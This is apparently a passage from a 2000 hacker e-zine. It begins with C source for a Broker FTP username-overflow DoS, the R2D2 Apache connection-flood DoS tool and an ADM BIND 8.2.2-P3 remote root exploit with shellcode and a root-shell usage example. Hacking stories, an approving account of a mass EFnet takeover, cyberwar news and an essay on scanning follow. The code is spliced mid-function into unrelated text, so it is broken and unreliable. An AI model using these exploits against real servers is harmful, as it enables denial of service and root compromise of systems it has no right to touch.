[eth0@hwa-security.net] */ /* [http://www.hwa-security.net*/ /**************************************************/ #include #include #include #include #include #include #include #include #include struct in_addr resolv (char *name) { static struct in_addr in; unsigned long l; struct hostent *ent; if ((l = inet_addr (name)) != INADDR_NONE) { in.s_addr = l; return in; } if (!(ent = gethostbyname (name))) { in.s_addr = INADDR_NONE; return in; } return *(struct in_addr *) ent->h_addr; } main (int argc, char *argv[]) { struct sockaddr_in addr; int i, s; char c; int port = 21; printf("Vulnerable systems: eth0 from HWA Broker FTP Server version 3.x Broker FTP Server version 4.x Immune systems: Broker FTP Server version 4.3.0.1 \n"); if (argc < 2) { printf ("Usage : %s [port]\n", argv[0]); exit (0); } if (argc == 3) port = atoi (argv[2]); s = socket (AF_INET, SOCK_STREAM, 0); addr.sin_family = AF_INET; addr.sin_addr = resolv (argv[1]); addr.sin_port = htons (port); connect (s, (struct sockaddr *) &addr, sizeof (addr)); write (s, "USER ", 5); for (i = 1; i <= 6002; i++) { write (s, "x", 1); } write (s, "\n", 1); read (s, &c, 1); printf("Done sending 6002 characters as the username...\n"); } @HWA 334.0 [HWA] Release: Grazer releases R2D2 dos ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* ------------------- R2D2.c ------------------ */ /* DIGIT-LABS PRIVATE!!!! DO NOT DISTRIBUTE!!! */ /* Released thru HWA-Security.net by GRAZER */ /* Oct 21 2000 */ /* grazer@hwa-security.net */ /* ------------------- R2D2.c ------------------ */ /* This tool will open a lot of connections (TCP) * to the target and port you specify. * * I have configured it to DoS some of the * Apache webservers. There is a little issue in * httpd.conf, the MaxClients default value is * 150 (RedHat 6.0 / Apache1.3.6), easy to fill up. * * I have built-in some scriptkiddie protection to * avoid some stupid people will mess with this tool. * * Thanks to Scrippie for some good ideas and help. * Thank to Mixter for help and addition. * * grazer@digit-labs.org * // grazer@hwa-security.net * * http://www.digit-labs.org || http://hwa-security.net */ #include #include #include #include char server_lag[] = "GET //////////////////////////////////////////// HTTP/1.0\n"; main(int argc, char *argv[]) { int MaxClients; int Timeout = 15; int times_to_connect; int sock, i, x, s[MaxClients], port; struct in_addr addr; struct sockaddr_in sin; struct hostent *he; if (argc<3) { printf("\nR2D2 Apache Default MaxClients DoS \n"); printf("usage : %s \n",argv[0]); printf("Times = Times to reconnect after Timeout \n"); printf(" by grazer \n"); exit(0); } times_to_connect = atoi(argv[1]); port = atoi(argv[2]); if ((he=gethostbyname(argv[1])) == NULL) { printf ("Cannot Lookup Host"); exit(0); } bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(port); MaxClients = 150; /* make this the victims httpd.conf MaxClient value */ for (x=0; x < times_to_connect; x++) { for (i=0;i>> ADM Bind 8.2.2-P3 <<< ripped/fucked for fbsd IRCnet #elitehackerz fucks to #!ADM remote bind 8.2.2 pre3 ported to FreeBSD by gunt3r >>> ADM Bind Rip 8.2.2-P3 <<< PRIVATE CODE -- DO NOT DISTRIBUTE -- PRIVATE greets to ADM, stran9er, holg3r bug in: bind/named/ns_req.c:req_inquery() */ /* offsets: 8.0.0 min = 0 options fake-iquery 8.2.2-P3 min = -100 8.1.1 min = 400 [ fake-iquery yes; ] */ /* Usage example: $ (./exploit 0 /bin/sh -c 'exec sh -i <&4 >&4 2>&4';cat) | nc localhost 53 Adress: 0xefbfd444 Offset: 0 sh: can't access tty; job control turned off # whoami root # */ #define QUERY_LEN 0x600 #include #include #include #include #include #include #include typedef struct { unsigned short int r_class; /* class number */ unsigned short int r_type; /* type number */ unsigned long int r_ttl; /* time to live */ unsigned short int r_size; /* size of data area */ char r_data[QUERY_LEN]; /* pointer to data */ } rrecord; char shellc[] = "\xEB\x4b\x5E\x33\xD2\x33\xC9\x33\xDB\x66\x8B\x04\x0E\x02" "\xC4\x88\x04\x16\x41\x41\x42\x22\xC0\x75\xF0\x02\xE4\x74\x0E\x8D\x04\x16" "\x89\x04\x1E\x43\x43\x43\x43\xEB\xE0\x90\x90\x33\xC0\x89\x04\x1E\x46\x88" "\x46\x0E\x46\x46\x46\x89\x46\x06\xB0\x3B\x8D\x4E\x10\x8B\x5E\x10\x8B\xD1" "\x8D\x76\x05\x52\x51\x53\x50\xFF\xE6\xE8\xB0\xFF\xFF\xFF\x6f\x21\x6f\x21" "\x6f\x21\xdf\x21\x6f\x21\x6f\x21\x6f\x21\xdf\x21\xdf\x21\x8B\x0F\x8B\x0F" "\x8B\x0F\xdf\x21\x8B\x0F\x02\x05\x8B\x0F\x6f\x21\x6f\x21\x6f\x21\xdf\x21"; char neshel1[] = "\x11\x11\x11\x11\x11\x11\x11\x11"; /* shellcode by */ char neshel2[] = "\x22\x22\x22\x22\x22\x22\xdf\x21"; /* stran9er 10'97 */ main(int argc, char **argv) { HEADER *h; rrecord *rr; char db[sizeof(HEADER)+sizeof(rrecord)+2]; char *buf, *ptr; unsigned char cat[]="no"; short int *buflen; unsigned long stack = 0xefbfd444, offset; int sh=1024,o,b,c,t; if ( (argc<3) || (*argv[2]!='/')) { printf ("usage %s offset /path/command [args ...] | netcat target 53\n",argv[0]); exit(1); } offset=atoi(argv[1]); stack+=offset; fprintf(stderr,"\nAdress: 0x%x Offset: %d\n",stack, offset); buf=db; memset(buf, 0, sizeof(db)); buflen=(short int *)buf; *buflen=htons(sizeof(db)-2); h = (HEADER *)(buf+2); h->id = rand() & 0xfff; h->opcode = IQUERY; h->ancount = htons(1); rr=(rrecord *)((char *)h+sizeof(HEADER)+1); rr->r_class= htons(C_IN); rr->r_type = htons(T_A); rr->r_ttl = htonl(31337); rr->r_size = htons(QUERY_LEN+1); ptr=rr->r_data+1; memset(ptr,0x90,QUERY_LEN); ptr[498]=0xeb; ptr[498+1]=21; /* damn: sprintf(dnbuf, "[%s]", inet_ntoa(data_inaddr((u_char *)data))); */ for(c=sh;c<=(QUERY_LEN-4);) { if ((c+4) > (QUERY_LEN-4)) stack +=4; ptr[c++] = stack & 0x000000ff; ptr[c++] = (stack & 0x0000ff00) >> 8; ptr[c++] = (stack & 0x00ff0000) >> 16; ptr[c++] = (stack & 0xff000000) >> 24; } strcpy(ptr+sh,shellc); for (b=2;b;) Enter BernZ, a young prospective hacker who wrote to me on one of my last days in Fairbanks, and asked me to help him learn the trade. Now, I get around 500 emails a week, from non-member sources and half of them are asking me the same thing. But something was different this time. He had a style that I liked. He defined what it was he could do, I told him this was called "Social Engineering" or standard old manipulation. I could hear him grin over the email. He asked to join the group after a couple of weeks of correspondence and I finally asked him where he was. East coast. The group was primarilly a west coast operation. East coast was a good idea though, both coastal areas were the biggest expanding computer related areas on the map. So we decided that yes he should indeed head up the East Coast movement. And so he did and is. My job moved to Portland, Oregon, so I followed. I needed a webserver so I moved it to it's current home: http://www.aracnet.com/~gen2600 This is where our hits really began to grow. Also our international image. Magazines started printing our address as a contriversial/underground webpage. We started turning heads. Somewhere along the line someone out there (Cheyenne Software) noticed that we carried serial numbers on our page and the real flame storm started that day. My account was frozen instantly. They froze the account to review what was really on the page and see if there was really any serial numbers, which all of you know is bigtime bad. I was facing around 2,000 counts of software piracy. The Oregon chapter of the Genocide2600 group got together that night and cracked the server, moving any evidence of the serial numbers off of the system. We got away again. Almost 3 days later I was at work at about 10am when my pager went off and told me to call home for messages, I did. Found a message from someone only identifying themselfs as "Mr. Jerkins" and that I should give him a call. I did, he said that he wanted to meet with me at my Gladstone Oregon home and that they would like to bring me somewhere to talk. I freaked, I don't care what anyone says, if they say that the hair on the back of thier necks doesn't stand on end when they get a call from the FBI, they are lying. I called a emergency meeting at my house of the Genocide2600 members from Oregon for later that night. We probably wore that recording out listening to it, trying to find out if it was indeed a joke. We finally decided, no it wasn't a joke. So I called him back and setup a time. They were five minutes early. Mr. Jerkins was with 4 other men dressed in suits, all smiling. They wanted to take me to some place I didn't recognize, which is no shock seeing I only had lived there 3 months. But I wasn't going to chance it. I told them I wanted to go to Burgerville down the street at GlennEcho street. Hey, I know it sounds corney, but if you have ever seen "MoHolland Falls" you would understand. We packed into a late model Ford Royal Crown Victoria and headed to the burgerhouse. My leg was uncomfortable because of the Gerber MarkII boot knife pushing into my ankle and my right hand was on my switch blade the entire time. They didn't say a word while we got out of the car. We walked into Burgerville and everyone behind the counter followed us with thier eyes and heads. We had to look out of the norm, 4 suited guys all under 6 foot and me, black leather jacket and jeans, and a black "Skellum" shirt that says, "Un-natural disaster, can you feel hells laughter?" and six foot tall. We sat, I ate and we talked for almost one hour. Only two of the four talked. Mr. Jerkins and someone else whome I can't remember his name. As soon as they opened thier mouths, I began to sweat. It seems I was dropped off at home as rapidly as they had picked me up. I sat there at my computer, my hands shaking, dialed up and jumped into my email program, pine. I wrote all members of the Genocide2600 group, in Alaska, Washington and Oregon and informed them, I had just been offered a job. That was only a couple of months ago now and I sit here at midnight typing away and not even wanting sleep anymore. In two weeks the Genocide2600 server goes up, the new dawn. http://www.Genocide2600.com -Genocide Head of the Genocide2600 Group *Embrace Freedom* gen2600@aracnet.com [EOF] @HWA 338.0 [HWA] Nov 2000: The day efnet nearly died, The ShadowKnight and Mafiaboy crusade ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Psuedo editorial by Cruciphux EFnet was owned. yes it was. it didnt happen quite the way it was planned but it was a classy hack nonetheless. Over 20 oper account shells were compromised and services.us was owned. EFnet was at these hackers' mercy the charge? ALL CHANNELS OPLESS! ALL CHANNELS MODELESS!! ALL TOPICS TO PROCLAIM FREE MAFIABOY! FREE SHADOWKNIGHT! ... well it took most of the night and only 300 or so channels were taken but services.us was indeed owned and this hack had irc opers all across the globe SQUITting their servers like crazy trying to regain ops and channel control. Massive dosing taking place during the hack contributed to it's essential "failure" and to this date EFnet has not recovered, a massive state of channel desynch effectively fscked up efnet operations for a good week or more and some channels are still not back in the hands of their 'rightful owners' as most people know on EFnet it is like the great wild west, or frontier, you fight for your nick, your channels, you are packetted for dissention and general anarchy and chaos is the order of the day. This is not a one off event I was privy to this deed (I had 30 mins warning) and can say that it is truly a hack worthy of some regard. A Mass hack like this has not been seen in some time, also recently (Nov 13th) spaceport.jpl.nasa.gov and other nasa boxes were compromised resulting in several gloatfests and people ircing as ShadowKnght from the compromised box (allegedly a wingate(!)) it is at the time of this writing still unsecured and being exploited. I am told by purps of the original hack that there will be a reprise and this time they are aiming for total EFnet control, I think they have a good chance of pulling it off. Unfortunately this is not without some fallout, it is rumoured that HWA is under FBI investigation (#hwa-security was one of the channels that was left with ops, and we have irc opers in our wings) so there are a lot of EFNet denizens that are looking for revenge or at least to save face, not to mention the implications such a premeditated, contrived mass hack has on presumeably even national security, After all this is back bone ownage for all intent and purposes. Anyway the true fallout us yet to be seen HWA does not condone this action nor has any hand in its undertaking the people behind it just wanted us to cover the 'action'. Logs of the 'takeovers' are at the end of this story, heres some press regarding mafiaboy and shadowknight to set the scene. Some history: http://dailynews.yahoo.com/h/nm/20001107/wr/crime_hacker_dc_1.html Tuesday November 7 5:38 PM ET Calif. Man Who Hacked NASA Computers Pleads Guilty By Dan Whitcomb LOS ANGELES (Reuters) - A 20-year-old man who hacked into scores of U.S. government, NASA and university computers under the names ``Shadow Knight'' and ``Dark Lord'' has pleaded guilty to federal charges at a closed-door hearing, prosecutors said on Tuesday. Jason Allen Diekman, who faces a maximum of 16 years in prison, entered his plea to U.S. District Judge Dean Pregerson on Monday, said Thom Mrozek, a spokesman for the U.S. Attorney's Office in Los Angeles. Mrozek said the public was barred from the plea hearing for reasons that prosecutors would not disclose. Diekman, a resident of Mission Viejo, 339.0 [IND] Arab Hackers Hit U.S. Firm for Israeli Ties ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: http://www.abcnews.go.com/sections/world/DailyNews/mideast001106_cyberwar.html B E I R U T, Lebanon, Nov. 7 As Israelis and Palestinians exchange bullets and stones in the West Bank and Gaza, other partisans are waging a fierce war on the Internet — and drawing in the United States. On Thursday and Friday, Arab hackers attacked the Web site of U.S. company, Lucent Technologies, a company that does extensive high-tech business with Israel. The attack came just days after the F.B.I. in Washington warned the three-week old Arab-Israeli cyberwar could “spill over” into the United States. Beirut’s Daily Star newspaper reported Lucent security workers were able to repel the Arab attack before it could impact the Lucent site. Lucent is among 13 sites listed on a Web site that encouraged Arab supporters to assault Israeli sites. The site called itself ‘UNITY.’ Who Struck First? Sources in Lebanon say an Israeli site, www.wizel.com, began the cyber war in October by listing Palestinian and Hezbollah sites in Lebanon and elsewhere. Wizel has since disappeared, apparently replaced by a group calling itself “Israel Hackers.” The site encourages what it calls “the army of Israeli warriors on the ‘Net” to “search and destroy all of the Arab sites on the net.” It also tells its supporters that all they need is “a computer, a shell and [a sense of] revenge.” The Israeli group is targeting the Palestinian Authority site, Hezbollah’s El Manar television station in Lebanon, a Jordanian portal site and Iran’s Islamic Republic News Agency (IRNA) site. Another pro-Israel Web page posts an image of Palestinian leader Yasser Arafat holding dynamite sticks. Underneath it is a cartoon of Palestinian children holding guns emblazoned with United Nations Children’s Fund logos.. Arab Hackers’ Work Arab hackers claim to have recently downed the Israeli army Web site for at least five days. The army has since enlisted the U.S.-based AT&T corporation to host the site after the first downing, telecommunications sources here said. Israeli sites recently downed include the Israeli Ministries of Defense, Immigrant Absorption, Industry and Trade, Religious affairs and the Tel Aviv stock exchange. An Arab hacker in Beirut said, “We’re expecting the battle to heat up from our side in the next few days. Our cyberwar won’t stop until all of the attacked Zionist sites are destroyed.” @HWA 340.0 [HWA] HOTNEW at time of print, mass hack/dos of gaming sites ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Nov 8th 3:14a EST Another Ex-HWA member in shit with the law, (this can only be expected of such a rapidly growing motley crew) the are wanted for DoSing several multiplayer game servers.. DOSING/PACKETTING FOR ANY REASON BY ANYONE IS VERY LAME! and HWA does NOT condone the use of DDoS tools for anything other than legitimate bandwidth testing/network stress testing. In any case this person we find out is reportedly a 15 yr old cracker that was miffed his battlenet account was pulled (for reasons unknown packetting??) they took it upon themselves to effectively down the game network for at least 4 days possibly disrupting service longer/more widely through incidental means. http://www.battle.net/forums/diablo2-realmstatus/posts/ba/1.shtml Subject:Battle.net Update From:Battle.net Sysop Host:Blizzard Entertainment Date:Tue Nov 7 18:33:30 We have recently become aware of the fact that an individual, group or entity has instituted a server attack on both Battle.net and Blizzard's web pages. The result of this illegal activity has been that many of our customers are having difficulty logging on to the Battle.net game service and accessing Blizzard web pages. We are in the midst of implementing a solution, but we wanted to let you know that the situation is a direct result of attacks on our servers, not Battle.net stability. The FBI and certain European law enforcement agencies have been notified, and we are working in conjunction with them to identify the individual. Attacks on our servers will not be tolerated, and Blizzard fully intends to prosecute this individual to the fullest extent of the law. If you have any information about the individual, group or entity involved in this activity, please email hacks@blizzard.com. Thank you for your patience. We will post updates on the status of the servers as more information is available. http://www.infoceptor.com/newspro/comments/973662921,39533,.shtml Blizzard Servers Attacked - Deathwing @ 0:25:21 EST It looks like the prolonged downtime of Blizzard web servers and the problems Battle.net has experienced was not a coincidence. The following e-mail was received directly from Blizzard: We have recently become aware of the fact that an individual, group or entity has instituted a server attack on both Battle.net and Blizzard's web pages. The result of this illegal activity has been that many of our customers are having difficulty logging on to the Battle.net game service and accessing Blizzard web pages. We are in the midst of implementing a solution, but we wanted to let you know that the situation is a direct result of attacks on our servers, not Battle.net stability. The FBI and certain European law enforcement agencies have been notified, and we are working in conjunction with them to identify the individual. Attacks on our servers will not be tolerated, and Blizzard fully intends to prosecute this individual to the fullest extent of the law. If you have any information about the individual, group or entity involved in this activity, please email hacks@blizzard.com Serious stuff indeed... we certainly hope the individual will be found in the near future. Name: FUCK BLIZZARD E-Mail: I HOPE THEM MATHA FUCKERS DIE! Just kiddin Name: bewf E-Mail: is there an award for snitching? Name: 3f b33 3y3 w0n7 g37 m3 E-Mail: who says its just one person? and why lock this person(s) up, give them a job or have them help you with your problems... Name: CaSPeR E-Mail: don't u wish Lol of coarse its not a joke, most of bnet splits and problems are caused by indeviduals, unfortunatly i cannot tell you who they are but i do know 8) Name: Deathwing E-Mail: deathwing@infoceptor.com This is not a joke, it was sent to all fansite members via a @Blizzard e-mail adress. Name: DrunkenGoliath E-Mail: dave-o@telusplanet.net How come Blizzard said on their page they had problems while upgrading? This is a bad joke. Name: Chris E-Mail: You better stay quiet. I was turned on to this story by an ex member who was apparently behind the attacks he claims a younger kid narqed him out to the feds and that the FBI are currently in search of him. Nov 8th 3:14a EST - Cruciphux 341.0 [IND] Paranoia Vs. Transparency And Their Effects On Internet Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Paranoia Vs. Transparency And Their Effects On Internet Security by Mixter <* mixter@newyorkoffice.com> (* Please use mixter@hwa-security.net to contact mixter, his mail system is experiencing problems, mail will forward to a new address..) Lately, reactions to non-intrusive probes and network activity that is merely unexpected are becoming increasingly hostile; a result from increasing amounts of incidents and security threats. From my perspective of security, overreactions to activities not crossing authorization and legal boundaries, are leading to a scenario where anyone acquiring basic information about a system needs to be afraid about potential consequences. Seen under a wide scope, this leads to network security no longer being transparent. Why a non-transparent security situation on the Internet is bad? Obviously, it is a big advantage to malicious intruders who have no legal concerns because they can conceal their identity through compromised systems, and a big disadvantage to security firms, admins and individuals who depend on a complete picture of Internet security problems to solve them. Non-malicious, beneficial large scale scans like the broadcast amplifier scanning projects are becoming harder and riskier to perform using legal resources. Network scanning and corresponding tools evolved out of a necessity to counter new intrusion methods after they were commonly employed by system crackers. [1] A scanner is simply security software that automates the process of making connections to a service to determine its availability and version, which allows drawing conclusions regarding security and potential vulnerability. Scanning a host is the fastest way to identify its remote vulnerabilities since it puts the analyst in the same perspective as an attacker, seeing all possible holes. The cause of todays widespread security problems is that people ignore security measures that are merely common sense. Many sites exist with gaping holes because their admins just don't know any better. They don't see a threat to their small unimportant site. Which is wrong, since the Internet is a network with literally millions of potential intruders, and the majority of intruders, no matter if kiddy or criminal, select random targets to compromise and use as their resources, which means that each site is at risk equally. Another big problem is that many admins lack the time to investigate all potential security issues, let alone all new vulnerabilities and advisories. As it is currently a part of my work to read and evaluate all information from the most important security lists and sites, I can say it is a task that takes at least one hour each and every day, and another hour if you really want to understand everything you read. This adds to the negative effects of information about security of a broad range of Internet hosts not being openly available. Since it is so difficult to obtain statistic information on widespread security issues, there is little awareness on the security issues that are really important, and it is a lot harder for the average admin to determine what security issues to check and protect against with priority out of the mass of security vulnerabilities and problems that are known today. I believe the problem of networks with gaping security holes has grown larger than most people, including most security professionals, expect. The result of a recent study of a research group was that 50% of all smaller enterprises are going to have to deal with intrusions by 2003. [2] The problem of raising awareness to security problems is, that security news, incidents, and publications of security tools and advisories only generate more awareness for people who already have a basic knowledge of security. But a lot of people responsible for Internet sites still don't have enough awareness to take the very fundamental steps to protect against intrusions. They will never seek security services themselves, either. Battling incidents and insecurity on the Internet is a question of reaching and contacting as many people of this kind as possible. In this context, large scale auditing and gathering of vulnerability information could be a viable tool of identifying and notifying these people; you could even see it as a process of mass security education. Transparency, in this context, means the possibility of freely accessing hosts and networks in non-harmful, non-intrusive ways for the purpose of security reconnaissance, without being seen and treated as malicious attacker. The importance of network transparency is comparable with the reasons for publishing advisories and exploits in the name of full-disclosure. The process demonstrates how exactly security issues are a problem, and how they can lead to incidents. Arguably, the recent popularity of Intrusion Detection Systems is not a bad trend. IDS capabilities can be viable for detecting and blocking intrusions, when they are employed by someone with sufficient background knowledge to make a difference between serious signs of incidents and harmless reconnaissance or false positives. But intrusion detection is not the only thing that can be relied on, it is just a part of the reactive protection measures, while assessment and scanning constitute the necessary pro-active measures. And performing pro-active security measures beyond your own network is justified, considering the fact that on a public network, our own security is always threatened by the security problems of others. Without machines in all parts of the world being compromised, attackers would hardly be able to strike anonymously and cover their tracks in a meaningful way. Spoofed packet attacks, DDoS agents and trojans used for relaying connections, as well as compromise of related hosts via password sniffing, would pose a less serious threat. Eliminating this threat can only be in everyone's interest, primarily for those admins unaware of security, who have their sites compromised and unknowingly used in attacks against third parties. [3] Of course, the toleration of any client activities on a host is always a matter of trust, a concept that I don't even want to start discussing. But fact is, in the case of malicious intruders and "aggressive" scans, nobody has a choice of accepting them or not, since they usually come from another compromised machine, and even if not, there are hundreds of other potential attackers waiting out there for every one that you manage to track down. With links to the Internet you are part of a globally accessible network, which means the best thing to do is turning off the services you don't want to have accessed, or set up access controls and firewalls, which is encouraged, but rarely done consequently in practice. A situation where I see a direct justification of scanning is, for example, when doing a financial transaction over an e-commerce site. Personally, checking out the general security of a site, as a consumer before submitting billing info gives me more security than any certification can. I even see this as advantage for the company offering the service. If they have poor security, people would stay away from them, or possibly notify them, reducing their costs by preventing incidents (and the accompanying lawsuits of customers who have fallen victim to an attack). If they have good security, people would know it and prefer their services. Another example is the spam problem. When receiving unsolicited mass mails in annoying proportions, I think it is justified to examine the third party smtp server, from which the mails were relayed to hundreds of addresses without authorization. Often, you can determine a lot of problems with such systems, they are mostly excellent examples of sites totally unaware of security. In that case, it's time to explain the admin a bit about network security and third party responsibilities. I think if more people would do such things, even be encouraged to do it, cybercrime laws and government regulations of IT businesses' security would eventually become superfluous. The criminalization of scanning and the general access of network services that some people don't like to have accessed - already, the current laws can label almost any activity on a network as intrusion, because they can be interpreted arbitrarily - will ultimately lead to a situation where companies and individuals performing scans and network surveys for security relevant data are going to have big problems, while system crackers using illegally acquired resources can effectively still probe and attack any site. The situation full-disclosure security measures is on its way to get worse, perhaps a lot worse, as governments try to introduce legislation like the international convention on cybercrime, which would criminalize anything from sniffing and using crypto on your own network to the possession and development of security tools, let alone remote network activities. Without calling this trend an evil government conspiracy, you can safely say that people working to advance such legislation are not acting in the best interest of security and e-commerce, not solely out of stupidity or lack of knowledge, but because there are lots of people getting advantages out of criminalizing benevolent security practice - think of new government jobs, legal powers over the security industry, and the possibilities for domestic surveillance. If the government and the security community decides that consumers and users on the Internet, who are directly affected by the security of their peers, should not have the right to scan, then their only recourse will be legal. [1] An example for this trend is the popular paper "Improving the Security of Your Site by Breaking Into it" along with development of the first widely-used security scanner, SATAN. http://wzv.win.tue.nl/satan/demo/docs/admin_guide_to_cracking.html [2] See: http://www.newsbytes.com/pubNews/00/156531.html [3] Legal liability for compromised systems that unknowingly participate in incidents, such as DDoS attacks, may be enforced more strictly soon: http://www.infoworld.com/articles/hn/xml/00/09/29/000929hnddosliability.xml _______________________________________________________________________________ Security Papers - mixter.warrior2k.com/papers.html - mixter.void.ru/papers.html @HWA 342.0 [IND] Trouble in the Holy land, Cyberwar and the Israeli Underground's Press Release. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Press:http://www.thestandard.com/article/article_print/0,1153,20087,00.html Back: http://www.thestandard.com/article/display/0,1151,20087,00.html November 09, 2000 A Hacker With a Cause Mikael Bouzaglo's cracking exploits on anti-Israeli sites are bringing him fame – and helping to spur a stinging counterattack by pro-Palestinian hackers. By Avi Machlis JERUSALEM – Mikael Bouzaglo talks like a soldier in the thick of crossfire as he recalls the battles waged from his computer. A former firefighter in the Israeli army, Bouzaglo was discharged in September. But he has kept up a campaign of hacking into anti-Israeli Web sites that he was engaged in for several years. Last month, as violent clashes between Israel and Palestinians escalated throughout the West Bank and Gaza Strip, Bouzaglo launched his most ambitious offensive yet. Bouzaglo set out to humiliate Hezbollah, the Lebanese guerrilla movement in solidarity with the Palestinian cause. He stocked up on pizza and cola and sat down at his keyboard. He encountered surprisingly tough fortifications around the Hezbollah computer systems. After 19 hours, Bouzaglo said, he finally outwitted them and wrested control of a mirror site at Hizballa.org . Then, as if conquering a hill after a bloody battle, Bouzaglo planted on the site an Israeli flag and an audio file that played the Jewish state's national anthem. "It was harder to penetrate than I expected," he says. "The Arabs are not bad in this virtual war." Arab retaliation came hard and fast to this and other Israeli assaults on the Web. In a series of computer attacks known in technical circles as "distributed denial of service" attacks, Arab hackers knocked down official sites of Israel's foreign ministry and the Knesset, or parliament, by striking servers at Netvision, a leading Israeli Internet service provider. In a separate attack, for which a secretive Arab hacker nicknamed "m0nk3y of Arab" claimed responsibility, Netvision's mail servers were hobbled for about a day. As the virtual war intensified and attracted increasing interest from the local and international media, Bouzaglo was torn. His instincts warned him not to go public. Hackers around the world operate in the shadows of cyberspace and almost never show their faces. But Bouzaglo dreams of becoming a politician for Israel's right-wing Likud party. Putting on a pressed shirt and dark tie, he took to the airwaves everywhere, from Israel radio and television to CNN. He since has become something of a celebrity and recently spoke before an Internet committee in the Knesset. In the glare of the media spotlight, Bouzaglo has flip-flopped in classic politician style. He's now calling on his comrades to stop attacking Arab sites, but that doesn't mean he's showing any regret for the hacks that brought him attention. "The Net has a lot of power," Bouzaglo says, adding that he was spurred to action after a Palestinian mob lynched two Israeli soldiers early in the conflict. "Millions of visitors from around the world are entering these sites to see Israel as the bad guy." Middle East hackers often struggle to overcome a bad-guy image. Bouzaglo and m0nk3y of Arab might take opposite sides on politics, but both reject the label of cyberterrorist, preferring to see themselves as rebels with a cause. As the computer war shows, the Internet has empowered a generation of hackers armed with nothing more than Web access to challenge the online world. It doesn't take much. According to one Israeli familiar with his work, Bouzaglo isn't a top-tier hacker. He didn't serve in the Israeli army's crack computer unit, where many Israeli computer experts cut their teeth. Instead, his service as a firefighter in Israel, where fires are few and far between, left him with plenty of time to tinker on his laptop and teach himself Java and HTML. Since his release from the army in September, Bouzaglo has spent much of his time operating a Web site geared toward stopping violence in Israeli society. He also teaches computer classes at an elementary school and occasionally indulges in some hacking from his parents' apartment in Holon, just south of Tel Aviv. The speed and potency of the Arab hackers' retaliation for cyberattacks have prompted Bouzaglo to disavow his hacking ways. "These attacks are pointless," he says. "It's just a virtual war game." Still, Bouzaglo does not rule out cooperating with Israeli authorities to devise more-sophisticated and surreptitious tactics to attack its enemies via the Web. So it was no surprise that pleas to his Arab adversary to end the hostilities sparked suspicion. Hackers on all sides know that once a cyberwar spreads it can be tough to control. Arab hackers like m0nk3y of Arab relish the opportunity to fight Israelis on the Internet. They see it as a level playing field, in contrast to the conflict on the ground, in which they believe Israel is using grossly disproportionate force. "What we are doing now is a fair war," m0nk3y of Arab states in e-mail correspondence. "Brains vs. brains." Brains on both sides quickly learned that Israel is particularly vulnerable to electronic warfare. Israel might be more wired than Arab countries, but it also has relatively small pipes that connect the country to the rest of the Internet, making it susceptible to attacks at choke points. "We all know that Israeli high-tech companies have a world-class reputation, but this does not mean that we are weak or useless," m0nk3y of Arab states. Bouzaglo agrees that Israel's networks are vulnerable. "In this war," he says, "the Arab hackers will win." Press:http://www.thestandard.com/article/article_print/0,1153,20102,00.html November 09, 2000 A Virtual Olive Branch In a chat session arranged especially for The Standard, an Israeli hacker asks his two Arab counterparts for a truce in the Mideast cyberwar. By Industry Standard Staff JERUSALEM – As clashes raged between Israelis and Palestinians on the first night of November, tentative talks were taking place deep in cyberspace among three participants in a virtual war that has flared up alongside the Middle East crisis. The prospect of meeting the enemy and the opportunity to sound off persuaded two Arab hackers and one Israeli hacker to face off in a chat session arranged exclusively for The Standard. Participating were Mikael (Miki) Bouzaglo, a 22-year-old Israeli hacker with political ambitions; m0nk3y of Arab, 23, a mysterious hacker from somewhere in the Middle East; and Sammy, a 26-year-old U.S.-based Arab hacker. All claim to have played some role in the recent spate of attacks and counterattacks on Arab and Israeli servers. Following are excerpts of their chat session, which was moderated by The Standard. The excerpts have been edited for clarity. What began as a surprisingly cordial exchange led to Israeli pleas for a cybertruce, shifting at times into the emotional and sometimes militant politics that have characterized the Middle East peace process for decades. Although the dialogue is choppy at times, it provides a rare glimpse into how the Net can be used as both a weapon and as a medium for fostering communication between the most bitter of enemies. Avi: Do you guys have any respect, as hackers, for what you've been doing to each other? Miki: Yes. Miki: I respect him. m0nk3y of Arab: I always respect my enemy, whoever he is. Sammy: Hmmm. Miki: Because first of all, he is a person. Both sides were asked to briefly provide details of their regional hacking experiences before the latest wave of violence in the Middle East crisis erupted. The Arabs were much more guarded than Bouzaglo. Avi: Did you guys attack Israeli sites before? Sammy: Probably. m0nk3y of Arab: Sites? No. Machines? Yes. Avi: Servers, you mean? m0nk3y of Arab: You can say that. Avi: Miki: What about you? Miki: In the past, I hacked some sites in Lebanon. m0nk3y of Arab: Can you define which sites? Miki: almanar mokowama atc. almanar.com.lb m0nk3y of Arab: Got it. Miki: And more propaganda sites that call to "Kill the Israeli." Politics snuck into the next round of dialogue – but were quickly snuffed out – when participants were asked whether they consider themselves part of global hacker culture, or a breed apart, since they are ideologically driven. Avi: Do you feel like you fit into the general hacker scene or is it different? Sammy: Yes, but with ethics. For a good cause. m0nk3y of Arab: Agree. Avi: Which is in this case is? Sammy: The sick propaganda. Miki: But Monkey, don't you think that the Palestinians started this war? Miki: Believe me, we want peace. But it's not easy. Sammy: Let's not get into politics, please. Bouzaglo then jumps into his main message for the evening, pleading with his Arab counterparts to halt the online hostilities. Miki: May I ask you something, Monkey? m0nk3y of Arab: Do. Miki: Will you continue to attack the Netvision servers? Or do you think that we need to change tactics? m0nk3y of Arab: If I stop, my mates will continue till all Palestinians get their rights. It's not my decision only, miki ... We are a team. Miki: But I will tell you something. I stopped it, I stopped the attacks. Both sides have said their main motivation for attacking has been to silence propaganda on the other side. But in a wired world, people can always find alternative ways of getting the same information. Avi: Isn't it kind of futile to spend all your time on this? Miki: This is why I changed tactics. I spoke on TV and radio to stop all the attacking. m0nk3y of Arab: Right, but [the attacks] make it more difficult for normal people to find the other point of view. Miki goes back to his cease-fire appeal. Miki: Can 